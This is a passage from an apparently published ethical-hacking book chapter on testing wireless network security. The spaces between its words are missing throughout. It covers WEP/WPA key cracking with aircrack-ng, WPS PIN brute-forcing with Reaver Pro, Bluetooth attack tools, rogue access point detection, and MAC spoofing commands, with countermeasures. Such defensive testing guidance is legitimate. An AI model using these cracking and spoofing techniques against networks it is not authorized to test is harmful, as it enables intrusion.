IfyouwantthepowerofthesecuritytoolsthatrunonLinux,butyou’renotinterestedininstallingandlearningmuchaboutLinuxordon’thavethetimetodownloadandsetupmanyofitspopularsecuritytools,IhighlyrecommendyoucheckoutKaliLinux.ThebootableDebian-basedsecuritytestingsuitecomeswithaslewoftoolsthatarerelativelyeasytouse.Alternativebootable(orlive)testingsuitesincludetheFedoraLinux-basedNetworkSecurityToolkit(www.networksecuritytoolkit.org).AcompletelistingoflivebootableLinuxtoolkitsisavailableatwww.livecdlist.com.

MostofthetestsIoutlineinthischapterrequireonlyWindows-basedutilitiesbutusetheplatformyou’remostfamiliarwith.You’llgetbetterresultsthatway.MyfavoritetoolsforassessingwirelessnetworksinWindowsareasfollows:

Aircrack-ng(http://aircrack-ng.org)CommViewforWiFi(www.tamos.com/products/commwifi)ElcomSoftWirelessSecurityAuditor(www.elcomsoft.com/ewsa.html)OmniPeek(www.savvius.com)

Youcanalsouseahandheldwirelesssecuritytestingdevice,suchasthehandyDigitalHotspotterbyCanaryWireless(www.canarywireless.com)andevenyourAndroid-basedphoneortabletwithappssuchasWiEyeorWifiAnalyzeroriOSdevicewithappssuchasNetworkAnalyzerandNetworkMultimeter.Anexternalantennaisalsosomethingtoconsideraspartofyourarsenal.Ihavehadgoodluckrunningtestswithoutanantenna,butyourmileagemayvary.Ifyou’reperformingawalkthroughofyourfacilitiestotestforwirelesssignals,forexample,usinganadditionalantennaincreasesyouroddsoffindingbothlegitimateand(moreimportant)unauthorizedwirelesssystems.Youcanchooseamongthreetypesofwirelessantennas:

Omnidirectional:Transmitsandreceiveswirelesssignalsin360degreesovershorterdistances,suchasinboardroomsorreceptionareas.Theseantennas,alsoknownasdipoles,typicallycomeinstalledonAPsfromthefactory.

http://www.kismetwireless.net/

http://sourceforge.net/projects/wellenreiter/

http://www.kali.org

http://www.networksecuritytoolkit.org/

http://www.livecdlist.com/

http://aircrack-ng.org/

http://www.tamos.com/products/commwifi/

http://www.elcomsoft.com/ewsa.html


http://www.canarywireless.com

Semidirectional:Transmitsandreceivesdirectionallyfocusedwirelesssignalsovermediumdistances,suchasdowncorridorsandacrossonesideofanofficeorbuilding.Directional:Transmitsandreceiveshighlyfocusedwirelesssignalsoverlongdistances,suchasbetweenbuildings.Thisantenna,alsoknownasahigh-gainantenna,istheantennaofchoiceforwirelesshackersdrivingaroundcitieslookingforvulnerableAPs—anactknownaswardriving.

Asanalternativetotheantennasdescribedintheprecedinglist,youcanuseaniftycandesign—calledacantenna—madefromaPringles,coffee,orpork-and-beanscan.Ifyou’reinterestedintryingthis,checkoutthearticleatwww.turnpoint.net/wireless/has.htmlfordetails.AsimpleInternetsearchturnsupalotofinformationonthissubject,ifyou’reinterested.Onesiteinparticular(www.cantenna.com)sellstheSuperCantennakit,whichhasworkedwellforme.

http://www.turnpoint.net/wireless/has.html

http://www.cantenna.com/

DiscoveringWirelessNetworksAfteryouhaveawirelesscardandwirelesstestingsoftware,you’rereadytoroll.Thefirsttestsyoushouldperformgatherinformationaboutyourwirelessnetwork,asdescribedinthefollowingsections.

CheckingforworldwiderecognitionThefirsttestrequiresonlytheMACaddressofyourAPandaccesstotheInternet.(YoucanfindoutmoreaboutMACaddresseslaterinthischapter,inthe“Macspoofing”section.)You’retestingtoseewhethersomeonehasdiscoveredyourWi-Fisignalandpostedinformationaboutitfortheworldtosee.Here’showthetestworks:

1. FindyourAP’sMACaddress.

Ifyou’renotsurewhatyourAP’sMACaddressis,youshouldbeabletoviewitbyusingthearp-acommandataWindowscommandprompt.Youmighthavetopingtheaccesspoint’sIPaddressfirstsotheMACaddressisloadedintoyourARPcache.Figure10-1showswhatthiscanlooklike.

2. AfteryouhavetheAP’sMACaddress,browsetotheWiGLEdatabaseofwirelessnetworks(https://wigle.net).

3. Registerwiththesitesoyoucanperformadatabasequeries.It’sworthit.

4. SelecttheLoginlinkintheupperrightcornerofthewebsiteandthenselectViewandthenSearch

YouseeascreensimilartoFigure10-2.

5. Toseewhetheryournetworkislisted,youcanentersuchAPinformationasgeographicalcoordinatesandSSID(servicesetidentifier),butthesimplestthingtodoisenteryourMACaddressintheformatshownintheexamplefortheBSSID/MACtextbox.

IfyourAPislisted,someonehasdiscoveredit—mostlikelyviawardriving—andhaspostedtheinformationforotherstosee.Youneedtostartimplementingthesecuritycountermeasureslistedinthischapterassoonaspossibletokeepothersfromusingthisinformationagainstyou!

Figure10-1:FindingtheMACaddressofanAPbyusingarp.

https://wigle.net

Figure10-2:SearchingforyourwirelessAPsusingtheWiGLEdatabase.

ScanningyourlocalairwavesMonitortheairwavesaroundyourbuildingtoseewhatauthorizedandunauthorizedAPsyoucanfind.You’relookingfortheSSID,whichisyourwirelessnetworkname.Ifyouhavemultipleandseparatewirelessnetworks,eachonemayormaynothaveauniqueSSIDassociatedwithit.

YoucangetstartedwithatoolsuchasNetStumbler(www.netstumbler.com/downloads).NetStumblercandiscoverSSIDsandotherdetailedinformationaboutwirelessAPs,includingthefollowing:

MACaddressNameRadiochannelinuseVendornameWhetherencryptionisonoroffRFsignalstrength(signal-to-noiseratio)

NetStumblerisquiteoldandisnolongermaintainedbutitstillworksnonetheless.AnothertooloptionisinSSIDer(www.inssider.com).

Figure10-3showsanexampleofwhatyoumightseewhenrunningNetStumblerinyourenvironment.Theinformationthatyouseehereiswhatotherscanseeaslongasthey’reinrangeofyourAP’sradiosignals.NetStumblerandmostothertoolsworkby

http://www.netstumbler.com/downloads

http://www.inssider.com

sendingaprobe-requestsignalfromtheclient.AnyAPswithinsignalrangemustrespondtotherequestwiththeirSSIDs—thatis,ifthey’reconfiguredtobroadcasttheirSSIDsuponrequest.

Figure10-3:NetStumblerdisplaysdetaileddataonAPs.

Whenyou’reusingwirelessnetworkanalyzers,includingOmniPeekandCommViewforWiFi,youradaptermightenterpassivemonitoringmode.ThismeansyoucannolongercommunicatewithotherwirelesshostsorAPswhiletheprogramisloaded.

DiscoveringWirelessNetworkAttacksandTakingCountermeasures

Variousmalicioushacks—includingDoSattacks—canbecarriedoutagainstyourWLAN.ThisincludesforcingAPstorevealtheirSSIDsduringtheprocessofbeingdisassociatedfromthenetworkandrejoining.Inaddition,hackerscanliterallyjamtheRFsignalofanAP—especiallyin802.11band802.11gsystems—andforcethewirelessclientstore-associatetoarogueAPmasqueradingasthevictimAP.

Hackerscancreateman-in-the-middleattacksbymaliciouslyusingatoolsuchastheWiFiPineapple(www.wifipineapple.com/index.php)andcanfloodyournetworkwiththousandsofpacketspersecondbyusingtherawpacket-generationtoolsNping(https://nmap.org/nping)orNetScanToolsPro(www.netscantools.com)—enoughtobringthenetworktoitsknees.Evenmoresothanwithwirednetworks,thistypeofDoSattackisverydifficulttopreventonWi-Fi.

YoucancarryoutseveralattacksagainstyourWLAN.Theassociatedcountermeasureshelpprotectyournetworkfromthesevulnerabilitiesaswellasfromthemaliciousattackspreviouslymentioned.WhentestingyourWLANsecurity,lookoutforthefollowingweaknesses:

UnencryptedwirelesstrafficWeakWEPandWPApre-sharedkeysCrackableWi-FiProtectedSetup(WPS)PINsUnauthorizedAPsEasilycircumventedMACaddresscontrolsWirelessequipmentthat’sphysicallyaccessibleDefaultconfigurationsettings

AgoodstartingpointfortestingistoattempttoattachtoyourWLANasanoutsiderandrunageneralvulnerabilityassessmenttool,suchasLanGuardorNexpose.Thistestenablesyoutoseewhatotherscanseeonyournetwork,includinginformationontheOSversion,openportsonyourAP,andevennetworksharesonwirelessclients.Figure10-4showsthetypeofinformationthatcanberevealedaboutanAPonyournetwork,includingamissingadministratorpassword,anoutdatedoperatingsystem,andopenportsandsharesthatcanbeexploited.

https://www.wifipineapple.com/index.php

https://nmap.org/nping


Figure10-4:ALanGuardscanofaliveAP.

Don’toverlookBluetoothYouundoubtedlyhavevariousBluetooth-enabledwirelessdevices,suchaslaptopsandsmartphones,runningwithinyourorganization.Althoughvulnerabilitiesarenotasprevalentastheyarein802.11-basedWi-Finetworks,theystillexist(currently,over100Bluetooth-relatedweaknessesarelistedathttp://nvd.nist.gov),andquiteafewhackingtoolstakeadvantageofthem.YoucanevenovercomethepersonalareanetworkdistancelimitationofBluetooth’ssignal(typicallyjustafewmeters)andattackBluetoothdevicesremotelybybuildingandusingaBlueSniperrifle.(Seethefollowinglistforthewebsite.)VariousresourcesandtoolsfortestingBluetoothauthentication/pairinganddatatransferweaknessesinclude:

Blooover(http://trifinite.org/trifinite_stuff_blooover.html)

Bluelog—partofKaliLinux

BlueScanner(http://sourceforge.net/projects/bluescanner)

Bluesnarfer(www.alighieri.org/tools/bluesnarfer.tar.gz)

BlueSniperrifle(www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html)

Btscanner—partofKaliLinux

CarWhisperer(http://trifinite.org/trifinite_stuff_carwhisperer.html)

DetailedpresentationonthevariousBluetoothattacks(http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf)

Many(arguablymost)Bluetooth-relatedflawsarenothighrisk,theystillneedtobeaddressedbasedonyourownuniquecircumstances.MakesurethatBluetoothtestingfallwithinthescopeofyouroverallsecurityassessmentsandoversight.

EncryptedtrafficWirelesstrafficcanbecaptureddirectlyoutoftheairwaves,makingthiscommunicationsmediumsusceptibletoeavesdropping.Unlessthetrafficisencrypted,it’ssentandreceivedincleartextjustasonastandardwirednetwork.Ontopofthat,the802.11encryptionprotocols,WiredEquivalentPrivacy(WEP)—yep,it’sstillaround—andWi-FiProtectedAccess(WPA),havetheirownweaknessthatallowsattackerstocracktheencryptionkeysanddecryptthecapturedtraffic.ThisvulnerabilityhasreallyhelpedputWi-Fionthemap—sotospeak.

WEP,inacertainsense,actuallylivesuptoitsname:Itprovidesprivacyequivalenttothatofawirednetwork,andthensome.However,itwasn’tintendedtobecrackedsoeasily.WEPusesafairlystrongsymmetric(shared-key)encryptionalgorithmcalledRC4.HackerscanobserveencryptedwirelesstrafficandrecovertheWEPkeybecauseofaflawinhowtheRC4initializationvector(IV)isimplementedintheprotocol.ThisweaknessisbecausetheIVisonly24bitslong,whichcausesittorepeatevery16.7millionpackets—evensoonerinmanycases,basedonthenumberofwirelessclientsenteringandleavingthenetwork.

MostWEPimplementationsinitializewirelesshardwarewithanIVof0andincrementitby1foreachpacketsent.ThiscanleadtotheIVsreinitializing—startingoverat0—approximatelyeveryfivehours.Giventhisbehavior,Wi-FinetworksthathavealoweramountofusagecanbemoresecurethanlargeWi-Fi


http://trifinite.org/trifinite_stuff_blooover.html

http://sourceforge.net/projects/bluescanner/

http://www.alighieri.org/tools/bluesnarfer.tar.gz

http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

http://trifinite.org/trifinite_stuff_carwhisperer.html

http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf

environmentsthattransmitalotofwirelessdatabecausethere’ssimplynotenoughwirelesstrafficbeinggenerated.

UsingWEPCrack(http://sourceforge.net/projects/wepcrack),orAircrack-ng(http://aircrack-ng.org),attackersneedtocollectonlyafewminutes’uptoafewdays’(dependingonhowmuchwirelesstrafficisonthenetwork)worthofpacketstobreaktheWEPkey.Figure10-5showsairodump-ng(whichispartoftheAircrack-ngsuite)capturingWEPinitializationvectors,andFigure10-6showsaircrack’sairodumpatworkcrackingtheWEPkeyofmytestnetwork.

Figure10-5:UsingairodumptocaptureWEPinitializationvectors.

Figure10-6:UsingaircracktocrackWEP.

AirodumpandaircrackareverysimpletoruninWindows.Youjustdownloadandextracttheaircrackprograms,thecygwinLinuxsimulationenvironment,andthe

http://sourceforge.net/projects/wepcrack/


supportingpeekfilesfromhttp://aircrack-ng.organdyou’rereadytocapturepacketsandcrackaway!

Alongerkeylength,suchas128bitsor192bits,doesn’tmakeWEPexponentiallymoredifficulttocrack.ThisisbecauseWEP’sstatickeyschedulingalgorithmrequiresthatonlyabout20,000orsoadditionalpacketsbecapturedtocrackakeyforeveryextrabitinthekeylength.

ThewirelessindustrycameupwithasolutiontotheWEPproblemcalledWi-FiProtectedAccess(WPA).WPAusestheTemporalKeyIntegrityProtocol(TKIP)encryptionsystem,whichfixesalltheknownWEPissues.WPA2,whichquicklyreplacedtheoriginalWPA,usesanevenstrongerencryptionmethodcalledCounterModewithCipherBlockChainingMessageAuthenticationCodeProtocol(saythatfastthreetimes),orCCMPforshort,basedontheAdvancedEncryptionStandard(AES).WPAandWPA2runningin“enterprisemode”requirean802.1xauthenticationserver,suchasaRADIUSserver,tomanageuseraccountsfortheWLAN.

Fornon-enterprisewirelessAPs(andthereareplentyoutthereinbusiness),there’snogoodreasontonotberunningWPA2usingpre-sharedkeys(PSKs).

YoucanalsouseaircracktocrackWPAandWPA2-PSK.TocrackWPA-PSKencryption,youhavetowaitforawirelessclienttoauthenticatewithitsaccesspoint.Aquick(anddirty)waytoforcethere-authenticationprocessistosendade-authenticatepackettothebroadcastaddress.Thisissomethingmyco-author,PeterT.Davis,andIcoverindetailinourbook,HackingWirelessNetworksForDummies.

Youcanuseairodumptocapturepacketsandthenstartaircrack(youcanalsorunthemsimultaneously)toinitiatecrackingthepre-sharedkeybyusingthefollowingcommand-lineoptions:

#aircrack-ng-a2-wpath_to_wordlist<capturefile(s)>

WPAkeyrecoveryisdependentonagooddictionary.Thedictionaryfilesavailableatwww.outpost9.com/files/WordLists.htmlareagoodstartingpoint.Evenwithagreatdictionarychock-fullofpotentialpasswords,I’veoftenfoundthatdictionaryattacksagainstWPAarefutile.Knowyourlimitssoyoudon’twastetoomuchtimetryingtocrackWPAPSKsthatarenotcrackable.

AnothercommercialalternativeforcrackingWPAandWPA2keysisElcomSoftWirelessSecurityAuditor(EWSA).TouseEWSA,yousimplycapturewirelesspacketsinthetcpdumpformat(everyWLANanalyzersupportsthisformat),loadthecapturefileintotheprogram,andshortlythereafteryouhavethePSK.EWSAisalittledifferentbecauseitcancrackWPAandWPA2PSKsinafractionofthetimeitwouldnormallytake,butthere’sacaveat.Youmusthaveacomputerwithasupported



NVIDIAorAMDvideocard.Yep,EWSAdoesn’tjustusetheprocessingpowerofyourCPU—italsoharnessesthepowerandmammothaccelerationcapabilitiesofthevideocard’sgraphicsprocessingunit(GPU).Nowthat’sinnovation!

ThemainEWSAinterfaceisshowninFigure10-7.

Figure10-7:UsingElcomSoftWirelessSecurityAuditortocrackWPApre-sharedkeys.

UsingEWSA,youcantrytocrackyourWPA/WPA2PSKsatarateofupto173,000WPA/WPA2pre-sharedkeyspersecond.ComparethattothelowlyfewhundredkeyspersecondusingjusttheCPUandyoucanseethevalueinatoollikethis.Ialwayssayyougetwhatyoupayfor!

IfyouneedtouseyourWLANanalyzertoviewtrafficaspartofyoursecurityassessment,youwon’tseeanytrafficifWEPorWPA/WPA2areenabledunlessyouknowthekeysassociatedwitheachnetwork.Youcanentereachkeyintoyouranalyzer,butjustrememberthathackerscandothesamethingifthey’reabletocrackyourWEPorWPApre-sharedkeysbyusingoneofthetoolsImentionearlier.

Figure10-8showsanexampleofhowyoucanviewprotocolsonyourWLANbyenteringtheWPAkeyintoOmniPeekviatheCaptureOptionswindowbeforeyoustartyourpacketcapture.

Figure10-8:UsingOmniPeektoviewencryptedwirelesstraffic.

CountermeasuresagainstencryptedtrafficattacksThesimplestsolutiontotheWEPproblemistomigratetoWPA2forallwirelesscommunications.YoucanalsouseaVPNinaWindowsenvironment—free—byenablingPoint-to-PointTunnelingProtocol(PPTP)forclientcommunications.YoucanalsousetheIPSecsupportbuiltintoWindows,aswellasSecureShell(SSH),SecureSocketsLayer/TransportLayerSecurity(SSL/TLS),andotherproprietaryvendorsolutions,tokeepyourtrafficsecure.JustkeepinmindthattherearecrackingprogramsforPPTP,IPSec,andotherVPNprotocolsaswell,butoverall,you’reprettysafe,especiallycomparedtonoVPNatall.

Newer802.11-basedsolutionsexistaswell.Ifyoucanconfigureyourwirelesshoststoregenerateanewkeydynamicallyafteracertainnumberofpacketshavebeensent,theWEPvulnerabilitycan’tbeexploited.ManyAPvendorshavealreadyimplementedthisfixasaseparateconfigurationoption,socheckforthelatestfirmwarewithfeaturestomanagekeyrotation.Forinstance,theproprietaryCiscoLEAPprotocolusesper-userWEPkeysthatofferalayerofprotectionifyou’rerunningCiscohardware.Again,becarefulbecausecrackingprogramsexistforLEAP,suchasasleap(http://sourceforge.net/projects/asleap).ThebestthingtodoisjuststayawayfromWEP.

The802.11istandardfromtheIEEEintegratestheWPAfixesandmore.ThisstandardisanimprovementoverWPAbutisnotcompatiblewitholder802.11bhardwarebecauseofitsimplementationoftheAdvancedEncryptionStandard(AES)forencryptioninWPA2.

Ifyou’reusingWPA2withapre-sharedkey(whichismorethanenoughforsmallWi-Fi),ensurethatthekeycontainsatleast20randomcharacterssoitisn’tsusceptibletotheofflinedictionaryattacksavailableinsuchtoolsasAircrack-ngandElcomSoft

http://sourceforge.net/projects/asleap/

WirelessSecurityAuditor.TheattacksettingsforElcomSoftWirelessSecurityAuditorareshowninFigure10-9.

Figure10-9:ElcomSoftWirelessSecurityAuditor’snumerouspasswordcrackingoptions.

Asyoucansee,everythingfromplaindictionaryattackstocombinationattackstohybridattacksthatusespecificwordrulesareavailable.Usealong,randompre-sharedkeysoyoudon’tfallvictimtosomeonewithalotoftimeontheirhands!

KeepinmindthatalthoughWEPandweakWPApre-sharedkeysarecrackable,it’sstillmuchbetterthannoencryptionatall.Similartotheeffectthathomesecuritysystemsignshaveonwould-behomeintruders,awirelessLANrunningWEPorweakWPApre-sharedkeysisnotnearlyasattractivetoacriminalhackerasonewithoutit.Manyintrudersarelikelytomoveontoeasiertargetsunlesstheyreallywanttogetintoyours.

Wi-FiProtectedSetupWi-FiProtectedSetup(WPS)isawirelessstandardthatenablessimpleconnectivityto“secure”wirelessAPs.TheproblemwithWPSisthatitsimplementationofregistrarPINsmakeiteasytoconnecttowirelessandcanfacilitateattacksontheveryWPA/WPA2pre-sharedkeysusedtolockdowntheoverallsystem.Aswe’veseenovertheyearswithsecurity,everything’satradeoff!

WPSisintendedforconsumeruseinhomewirelessnetworks.IfyourwirelessenvironmentislikemostothersthatIsee,itprobablycontainsconsumer-gradewirelessAPs(routers)thatarevulnerabletothisattack.

TheWPSattackisrelativelystraightforwardusinganopensourcetoolcalledReaver(https://code.google.com/p/reaver-wps).Reaverworksbyexecutingabrute-forceattackagainsttheWPSPIN.Iusethecommercialversion,ReaverPro(www.reaversystems.com),whichisadevicethatyouconnectyourtestingsystemtooverEthernetorUSB.ReaverPro’sinterface,asshowninFigure10-10,isprettystraightforward.

Figure10-10:TheReaverProstartupwindow.

RunningReaverProiseasy.Yousimplyfollowthesesteps:

1. ConnecttotheReaverProdevicebypluggingyourtestingsystemintothePoELANnetworkconnection.YoushouldgetanIPaddressfromtheReaverProdeviceviaDHCP.

2. Loadawebbrowserandbrowsetohttp://10.9.8.1andloginwithreaver/fooastheusernameandpassword.

3. Onthehomescreen,presstheMenubuttonandalistofwirelessnetworksshouldappear.

4. SelectyourwirelessnetworkfromthelistandthenclickAnalyze.

5. LetReaverProrunanddoitsthing.

ThisprocessisshowninFigure10-11.

https://code.google.com/p/reaver-wps

http://www.reaversystems.com

Figure10-11:UsingReaverProtodeterminethatWi-FiProtectedSetupisenabled.

IfyouwishtohaveReaverProautomaticallystartcrackingyourWPSPIN,you’llneedtoclickConfigureandsettheWPSPinsettingtoOn.WPSPINcrackingcantakeanywherefromafewminutestoafewhours,butifsuccessful,ReaverProwillreturntheWPApre-sharedkeyorwilltellyouthatthewirelessnetworkistoofarawayorthatintruderlockoutisenabled.

I’vehadmixedresultswithReaverProdependingonthecomputerI’mrunningitonandthewirelessAPthatI’mtesting.It’sstillaworthyattackyoushouldpursueifyou’relookingtofindandfixthewirelessflawsthatmatter.

CountermeasuresagainsttheWPSPINflawIt’sraretocomeacrossasecurityfixasstraightforwardasthisone:DisableWPS.IfyouneedtoleaveWPSenabled,atleastsetupMACaddresscontrolsonyourAP(s).It’snotfoolproof,butit’sbetterthannothing!Morerecentconsumer-gradewirelessroutersalsohaveintruderlockoutfortheWPSPIN.IfthesystemdetectsWPSPINcrackingattempts,itwilllockoutthoseattemptsforacertainperiodoftime.ThebestthingstodotopreventWPSattacksintheenterpriseistonotuselow-endwirelessroutersinthefirstplace.

RoguewirelessdevicesWatchoutforunauthorizedAPsandwirelessclientsthatareattachedtoyournetworkandrunninginad-hocmode.

Also,besuretoeducateyourusersonsafeWi-Fiusagewhenthey’reoutsideofyouroffice.CommunicatetothemthedangersofconnectingtounknownWi-Fiandremindthemonaperiodicandconsistentbasis.Otherwise,theirsystemscanbehackedorbecomeinfectedwithmalware,andguesswhoseproblemitisoncetheyconnectbackontoyournetwork.

ByusingNetStumbleroryourclientmanagersoftware,youcantestforAPsandad-hoc(orpeer-to-peer)devicesthatdon’tbelongonyournetwork.Youcanalsousethenetworkmonitoringfeaturesinawirelessnetworkanalyzer,suchasOmniPeekandCommViewforWiFi.

LookforthefollowingrogueAPcharacteristics:

OddSSIDs,includingthepopulardefaultonessuchaslinksysandfreepublicwifi.MACaddressesthatdon’tbelongonyournetwork.LookatthefirstthreebytesoftheMACaddress(thefirstsixnumbers),whichspecifythevendorname.YoucanperformaMACaddressvendorlookupathttp://standards.ieee.org/develop/regauth/oui/public.htmltofindinformationonAPsyou’reunsureof.Weakradiosignals,whichcanindicatethatanAPhasbeenhiddenawayorisadjacenttoorevenoutsideofyourbuilding.Communicationsacrossadifferentradiochannel(s)thanwhatyournetworkcommunicateson.DegradationinnetworkthroughputforanyWi-Ficlient.

InFigure10-12,NetStumblerhasfoundtwopotentiallyunauthorizedAPs.TheonesthatstandoutarethetwowithSSIDsofBIandLarsWorld.Noticehowthey’rerunningontwodifferentchannels,twodifferentspeeds,andaremadebytwodifferenthardwarevendors.Ifyouknowwhat’ssupposedtoberunningonyourwirelessnetwork(youdo,don’tyou?),unauthorizedsystemsshouldreallystandout.

Figure10-12:NetStumblershowingpotentiallyunauthorizedAPs.

NetStumblerdoeshaveonelimitation:Itwon’tfindAPsthathaveproberesponse

http://standards.ieee.org/develop/regauth/oui/public.html

(SSIDbroadcast)packetsdisabled.CommercialwirelessnetworkanalyzerssuchasCommViewforWiFiaswellastheopensourceKismetlooknotonlyforproberesponsesfromAPslikeNetStumblerdoes,butalsoforother802.11managementpackets,suchasassociationresponsesandbeacons.ThisallowsKismettodetectthepresenceofhiddenWi-Fi.

IftheLinuxplatformisnotyourcupoftea,andyou’restilllookingforaquickanddirtywaytorootouthiddenAPs,youcancreateaclient-to-APreconnectionscenariothatforcesthebroadcastingofSSIDsusingde-authenticationpackets.YoucanfinddetailedinstructionsinthebookIwrotewithPeterT.Davis,HackingWirelessNetworksForDummies.

ThesafestwaytorootouthiddenAPsistosimplysearchfor802.11managementpackets.YoucanconfigureyourwirelessnetworkanalyzersuchasOmniPeektosearchfor802.11managementpacketsbyenablingacapturefilteron802.11managementpackets,asshowninOmniPeek’soptionsinFigure10-13.

Figure10-13:YoucanconfigureOmniPeektodetectAPsthatdon’tbroadcasttheirSSIDs.

Figure10-14showshowyoucanuseCommViewforWiFitospotanoddnetworkhost.Forinstance,intheexampleshowninFigure10-14,TechnicoandNetgearsystemsareshowingup,butonlyUbiquitihardwareisusedonthisparticularnetwork.

Figure10-14:UsingCommViewforWiFitospotwirelesssystemsthatdon’tbelong.

Mytestnetworkforthisexampleissmallcomparedtowhatyoumightsee,butyougettheideaofhowanoddsystemcanstandout.

Wi-Fisetupinad-hoc(orpeer-to-peer)modeenablewirelessclientstocommunicatedirectlywithoneanotherwithouthavingtopassthroughanAP.ThesetypesofWi-Fioperateoutsidethenormalwirelesssecuritycontrolsandcancauseserioussecurityissuesbeyondthenormal802.11vulnerabilities.

Youcanusejustaboutanywirelessnetworkanalyzertofindunauthorizedad-hocdevicesonyournetwork.Ifyoucomeacrossquiteafewad-hocsystems,suchasthosedeviceslistedasSTA(shortforstation)inCommViewforWiFi’sTypecolumn,asshowninFigure10-15,thiscouldbeagoodindicationthatone(orseveral)personisrunningunprotectedwirelesssystemsoratleasthasad-hocwirelessenabled.Thesesystemsareoftenprintersandotherseeminglybenignnetworksystems,buttheycanbeworkstationsandmobiledevices.Eitherway,they’repotentiallyputtingyournetworkandinformationatrisk,sothey’reworthcheckingout.

Figure10-15:CommViewforWifishowingseveralunauthorizedad-hocclients.

YoucanalsousethehandheldDigitalHotspotterImentionedearlierinthischapter(see“ChoosingYourTools”)tosearchforad-hoc–enabledsystemsorevenawirelessintrusionpreventionsystem(WIPS)tosearchforbeaconpacketsinwhichtheESSfieldisnotequalto1.

Walkaroundyourbuildingorcampus(warwalk,ifyouwill)toperformthistesttoseewhatyoucanfind.Physicallylookfordevicesthatdon’tbelongandkeepinmindthatawell-placedAPorWi-Ficlientthat’sturnedoffwon’tshowupinyournetworkanalysistools.Searchneartheoutskirtsofthebuildingornearanypubliclyaccessibleareas.Scopeoutboardroomsandtheofficesofupper-levelmanagersforanyunauthorizeddevices.Theseplacesmaybeoff-limits,butthat’sallthemorereasontocheckthemforrogueAPs.

Whensearchingforunauthorizedwirelessdevicesonyournetwork,keepinmindthatyoumightbepickingupsignalsfromnearbyofficesorhomes.Therefore,ifyoufindsomething,don’timmediatelyassumeit’saroguedevice.Onewaytofigureoutwhetheradeviceisinanearbyofficeorhomeisbythestrengthofthesignalyoudetect.Devicesoutsideyourofficeshouldhaveaweakersignalthanthoseinside.Usingawirelessnetworkanalyzerinthiswayhelpsnarrowthelocationandpreventfalsealarmsincaseyoudetectlegitimateneighboringwirelessdevices.

It’spaystoknowyournetworkenvironment.Knowingwhatyoursurroundingsshouldlooklikemakesiteasiertospotpotentialproblems.

AgoodwaytodeterminewhetheranAPyoudiscoverisattachedtoyourwired

networkistoperformreverseARPs(RARPs)tomapIPaddressestoMACaddresses.Youcandothisatacommandpromptbyusingthearp-acommandandsimplycomparingIPaddresseswiththecorrespondingMACaddresstoseewhetheryouhaveamatch.

Also,keepinmindthatWi-Fiauthenticatesthewirelessdevices,nottheusers.Criminalhackerscanusethistotheiradvantagebygainingaccesstoawirelessclientviaremote-accesssoftware,suchastelnetorSSH,orbyexploitingaknownapplicationorOSvulnerability.Aftertheydothat,theypotentiallyhavefullaccesstoyournetworkandyouwouldbenonethewiser.

CountermeasuresagainstroguewirelessdevicesTheonlywaytodetectrogueAPsandwirelesshostsonyournetworkistomonitoryourwirelessnetworkproactively(inrealtimeifpossible),lookingforindicatorsthatwirelessclientsorrogueAPsmightexist.AWIPSisperfectforsuchmonitoring.ButifrogueAPsorclientsdon’tshowup,thatdoesn’tmeanyou’reoffthehook.Youmightalsoneedtobreakoutthewirelessnetworkanalyzerorothernetworkmanagementapplication.

Usepersonalfirewallsoftware,suchasWindowsFirewall,onallwirelesshoststopreventunauthorizedremoteaccessintoyourhosts,andsubsequently,yournetwork.

Finally,don’tforgetaboutusereducation.It’snotfoolproof,butitcanhelpserveasanadditionallayerordefense.Ensurethatsecurityisalwaysonthetopofeveryone’smind.Chapter19containsadditionalinformationaboutuserawarenessandtraining.

MACspoofingAcommondefenseforwirelessnetworksisMediaAccessControl(MAC)addresscontrols.ThisiswhereyouconfigureyourAPstoallowonlywirelessclientswithknownMACaddressestoconnecttothenetwork.Consequently,averycommonhackagainstwirelessnetworksisMACaddressspoofing.

ThebadguyscaneasilyspoofMACaddressesinLinux,byusingtheifconfigcommand,andinWindows,byusingtheSMACutility,asIdescribeinChapter9.However,likeWEPandWPA,MACaddress-basedaccesscontrolsareanotherlayerofprotectionandbetterthannothingatall.IfsomeonespoofsoneofyourMACaddresses,theonlywaytodetectmaliciousbehavioristhroughcontextualawarenessbyspottingthesameMACaddressbeingusedintwoormoreplacesontheWLAN,whichcanbetricky.

OnesimplewaytodeterminewhetheranAPisusingMACaddresscontrolsistotrytoassociatewithitandobtainanIPaddressviaDHCP.IfyoucangetanIP

address,theAPdoesn’thaveMACaddresscontrolsenabled.

ThefollowingstepsoutlinehowyoucantestyourMACaddresscontrolsanddemonstratejusthoweasytheyaretocircumvent:

1. FindanAPtoattachto.

YoucandothissimplybyloadingNetStumbler,asshowninFigure10-16.

Inthistestnetwork,theAPwiththeSSIDofdoh!istheoneIwanttotest.NotetheMACaddressofthisAPaswell.Thiswillhelpyoumakesureyou’relookingattherightpacketsinthestepsthatfollow.AlthoughI’vehiddenmostoftheMACaddressofthisAPforthesakeofprivacy,let’sjustsayitsMACaddressis00:40:96:FF:FF:FF.Also,noticeinFigure10-16thatNetStumblerwasabletodeterminetheIPaddressoftheAP.GettinganIPaddresswillhelpyouconfirmthatyou’reontherightwirelessnetwork.

2. UsingaWLANanalyzer,lookforawirelessclientsendingaproberequestpackettothebroadcastaddressortheAPreplyingwithaproberesponse.

Youcansetupafilterinyouranalyzertolookforsuchframes,oryoucansimplycapturepacketsandjustbrowsethroughlookingfortheAP’sMACaddress,whichyounotedinStep1.Figure10-17showswhattheProbeRequestandProbeResponsepacketslooklike.

Notethatthewirelessclient(againforprivacy,supposeitsfullMACaddressis00:09:5B:FF:FF:FF)firstsendsoutaproberequesttothebroadcastaddress(FF:FF:FF:FF:FF:FF)inpacketnumber98.TheAPwiththeMACaddressI’mlookingforreplieswithaProbeResponseto00:09:5B:FF:FF:FF,confirmingthatthisisindeedawirelessclientonthenetworkforwhichI’llbetestingMACaddresscontrols.

3. Changeyourtestcomputer’sMACaddresstothatofthewirelessclient’sMACaddressyoufoundinStep2.

InUNIXandLinux,youcanchangeyourMACaddressveryeasilybyusingtheifconfigcommandasfollows:

a. Loginasrootandthendisablethenetworkinterface.

Insertthenetworkinterfacenumberthatyouwanttodisable(typicallywlan0orath0)intothecommand,likethis:

[root@localhostroot]#ifconfigwlan0down

b. EnterthenewMACaddressyouwanttouse.

InsertthefakeMACaddressandthenetworkinterfacenumberlikethis:[root@localhostroot]#ifconfigwlan0hwether01:23:45:67:89:ab

